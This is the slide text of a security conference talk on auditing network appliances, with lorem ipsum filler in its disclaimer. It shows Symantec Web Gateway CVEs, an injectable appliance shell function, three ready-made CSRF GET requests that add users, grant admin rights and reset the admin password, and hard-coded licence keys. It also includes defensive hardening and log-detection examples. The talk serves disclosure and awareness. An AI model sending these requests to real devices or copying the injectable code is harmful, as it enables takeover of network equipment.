all your appliances are belong to us
CATS: ALL YOUR APPLIANCES ARE BELONG TO US
Navaja Negra Conference
Disclaimer
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec non risus eros. Suspendisse ac quam et augue malesuada venenatis. Fusce condimentum libero ac tellus sagittis convallis. Nullam ut enim nisl. Suspendisse tincidunt elit eget turpis consectetur mollis lacinia felis aliquam. This talk is for educational and awareness purposes. Curabitur et libero leo, vel mattis ipsum. Mauris laoreet nibh ac mauris convallis at lacinia eros rutrum. Donec porttitor semper neque, eu fringilla mi egestas at. Donec gravida aliquam sem, sed ornare nisi euismod ut. Etiam sed odio ut nisi egestas rhoncus ut vel augue. In hac habitasse platea dictumst. Phasellus eros turpis, varius ac sodales sit amet, lobortis non elit.
Two madmen against the world
Alejandro Nolla Blanco
Threat Intelligence Analyst
Networking enthusiast
@z0mbiehunt3r
Rubén Garrote García
Security consultant / Pentester
Reversing enthusiast
@boken_
This slide is sponsored by
Agenda
Full Disclosure vs. Responsible Disclosure
Why audit our appliances?
Current situation
Demo!
Conclusions and recommendations
Why compromise an appliance?
“This thing comes hardened straight from the factory”
But don't touch it! Why are you touching it?
But that... must be complicated, right?
I'm not compromised - How do you know?
Are you sure you can trust blindly?
Out-of-the-box (in)security
Symantec Web Gateway 5.0.x.x

| CVE | Flaw |
|---|---|
| CVE-2012-2953 | command execution |
| CVE-2012-2957 | local file inclusion |
| CVE-2012-2574 | blind SQL injection |
| CVE-2012-2961 | SQL injection |
| CVE-2012-2976 | shell injection |
| CVE-2012-2977 | arbitrary credential change |
Examination of a certificate chain generated by a Cyberoam DPI device shows that all such devices share the same CA certificate and hence the same private key. It is therefore possible to intercept traffic from any victim of a Cyberoam device with any other Cyberoam device - or to extract the key from the device and import it into other DPI devices, and use those for interception.
WANTED
SSL certificates
SSH keys
Undocumented users
Backdoors
Privilege escalation
Web flaws
For more information see the Common Weakness Enumeration project (http://cwe.mitre.org)
OS Injection
```sh
do_addvs()
{
    # We are now going to handle a POST which is a real add
    # echo "<!-post = $post>"
    # vip=&port=&protocol=tcp&Commit=Add+VIP
    […]
    # $port, $vip, $protocol and $FFF come straight from the request and reach sed unvalidated
    grep -v "^%.*%" $f | sed -e "s/%PORT%/$port/" -e "s/%VIP%/$vip/" -e "s/%PROT%/$protocol/" -e "s/%NAME%/$FFF/"> $VIF[…]
}
```
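A hardened version of that substitution, added here as an example and not the appliance's own code: every request field is checked against a strict allow-list before it is spliced into the sed expression, so a value carrying sed metacharacters or shell-sensitive text is rejected before it does anything. The function name render_vif, the validator names and the template placeholders are assumptions.

```sh
#!/bin/sh
# Added example, not the appliance's code: allow-list each request field
# before it is spliced into the sed expression, so a value carrying sed
# metacharacters (/ & \ ;) or shell-sensitive text is rejected outright.

# is_port VALUE -> 0 if VALUE is an integer in 1..65535
is_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# is_ipv4 VALUE -> 0 if VALUE is a dotted quad with octets 0..255
is_ipv4() {
    case "$1" in ''|*[!0-9.]*) return 1 ;; esac   # digits and dots only
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet; do
        case "$octet" in '') return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
}

# is_proto VALUE -> 0 only for the two protocols the template supports
is_proto() { [ "$1" = tcp ] || [ "$1" = udp ]; }

# is_name VALUE -> 0 if VALUE is 1..32 characters of [A-Za-z0-9_-]
is_name() {
    case "$1" in ''|*[!A-Za-z0-9_-]*) return 1 ;; esac
    [ ${#1} -le 32 ]
}

# render_vif TEMPLATE VIP PORT PROTO NAME
# Writes the rendered config to stdout; prints nothing and returns 1 if
# any field fails validation. Lines that are only a placeholder
# (^%...%$) are dropped, as the original grep -v does.
render_vif() {
    f=$1 vip=$2 port=$3 protocol=$4 name=$5
    if ! is_ipv4 "$vip" || ! is_port "$port" || ! is_proto "$protocol" || ! is_name "$name"; then
        echo "rejected: invalid VIP, port, protocol or name" >&2
        return 1
    fi
    grep -v "^%.*%" "$f" | sed -e "s/%PORT%/$port/" -e "s/%VIP%/$vip/" \
        -e "s/%PROT%/$protocol/" -e "s/%NAME%/$name/"
}
```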
We create a new user:
```http
GET /config/password.php?action=edituser&t=1326400365&username=new_user&pass=new_pass&group=report&type=new&go=Add+New+User HTTP/1.1
```
We make any user an admin:
```http
GET /config/password.php?action=edituser&t=000&username=new_user&pass=new_pass&group=config&uid=4&go=Edit+User HTTP/1.1
```
We change any user's password:
```http
GET /config/password.php?action=edituser&t=1326152517&username=admin&pass=123abc.&uid=0&go=Edit+User HTTP/1.1
```
Super CSRF (wherever it's needed)
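The three requests above leave the same footprint whether an administrator typed them or a victim's browser was tricked into sending them, so the access log shows that a change happened, not who meant it. Added example, not from the appliance or the talk: a POSIX shell filter over constructed Common Log Format lines that flags user adds and edits carried in a GET to password.php and ranks edits of uid 0 or promotion to group=config highest; the log format and the function names are assumptions.

```sh
#!/bin/sh
# Added example, not from the appliance or the talk: flag state-changing
# GET requests to password.php in a web server access log. Because the
# edit travels in the URL, every field (the new password included) is
# written to the access log, which is both the forensic trace of the
# change and a secondary credential leak.

# Constructed sample log lines in Common Log Format; not from any device.
SAMPLE_LOG='10.1.1.20 - - [12/Jan/2012:10:12:45 +0100] "GET /config/password.php?action=edituser&t=1326400365&username=new_user&pass=new_pass&group=report&type=new&go=Add+New+User HTTP/1.1" 200 512
10.1.1.20 - - [12/Jan/2012:10:13:01 +0100] "GET /config/index.php HTTP/1.1" 200 1024
10.1.1.21 - - [12/Jan/2012:10:14:09 +0100] "GET /config/password.php?action=edituser&t=000&username=new_user&pass=new_pass&group=config&uid=4&go=Edit+User HTTP/1.1" 200 512
10.1.1.22 - - [12/Jan/2012:10:15:30 +0100] "GET /config/password.php?action=edituser&t=1326152517&username=admin&pass=123abc.&uid=0&go=Edit+User HTTP/1.1" 200 512'

# classify_edituser_gets: reads CLF lines on stdin, prints one line per
# user add/edit sent as GET:  <client-ip> <severity> <reason>
#   HIGH   the request edits uid 0 (built-in admin) or sets group=config
#   MEDIUM any other user creation or edit carried in a GET
classify_edituser_gets() {
    awk '
        $6 == "\"GET" && index($7, "/config/password.php?") == 1 && $7 ~ /action=edituser/ {
            sev = "MEDIUM"; why = "user add/edit via GET"
            if ($7 ~ /[?&]uid=0(&|$)/)             { sev = "HIGH"; why = "edit of uid 0 (admin)" }
            else if ($7 ~ /[?&]group=config(&|$)/) { sev = "HIGH"; why = "promotion to group=config" }
            if ($7 ~ /[?&]pass=/) why = why ", password logged in URL"
            print $1, sev, why
        }'
}

# count_high: number of HIGH findings in the constructed sample
count_high() {
    printf '%s\n' "$SAMPLE_LOG" | classify_edituser_gets | grep -c ' HIGH '
}
```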
```php
function validate_key($key) {
    [...]
    // the valid licence keys are hard-coded in the shipped PHP source
    $keys_va_r16 = array("CrUC7e3en2cH",
                         "P4E5RAswaR4c",
                         "YaYaY5w2ZaPr", [...]
                         "w9E4edasuthe",
                         "drub8spaT7uj");
    if (in_array($key, $keys_va_r16)) {
        cp($model_va_r16, $model_current);
    }
    […]
    write_licence(False, 0);
    echo "<center><p>Licence activated.</p></center>";
```
Going all out...
How to find these flaws?
“Black-box” and/or “white-box” audit
Static and/or dynamic analysis
RTFC (Read The Fucking Code)
Through fuzzing
Consequences
✗ Bypass of the protection measures
✗ Full compromise of the device
✗ Expansion of the intrusion
✗ Interception of network traffic
Expanding the intrusion - I (diagram: INTERNET, DMZ, INTERNAL NETWORK; entry via a web request, GET /blablabla HTTP/1.1)
Expanding the intrusion - II (diagram: INTERNET, DMZ, INTERNAL NETWORK; SSH connection)
It's show time!
Conclusions
➢ If you audit your applications, why not your appliances?
➢ Why deploy something we know nothing about?
➢ Delivery deadlines get met everywhere
Recommendations
✔ Never trust anything blindly
✔ Reduce the exposed surface
✔ Review the existing infrastructure
✔ When in doubt, the environment is hostile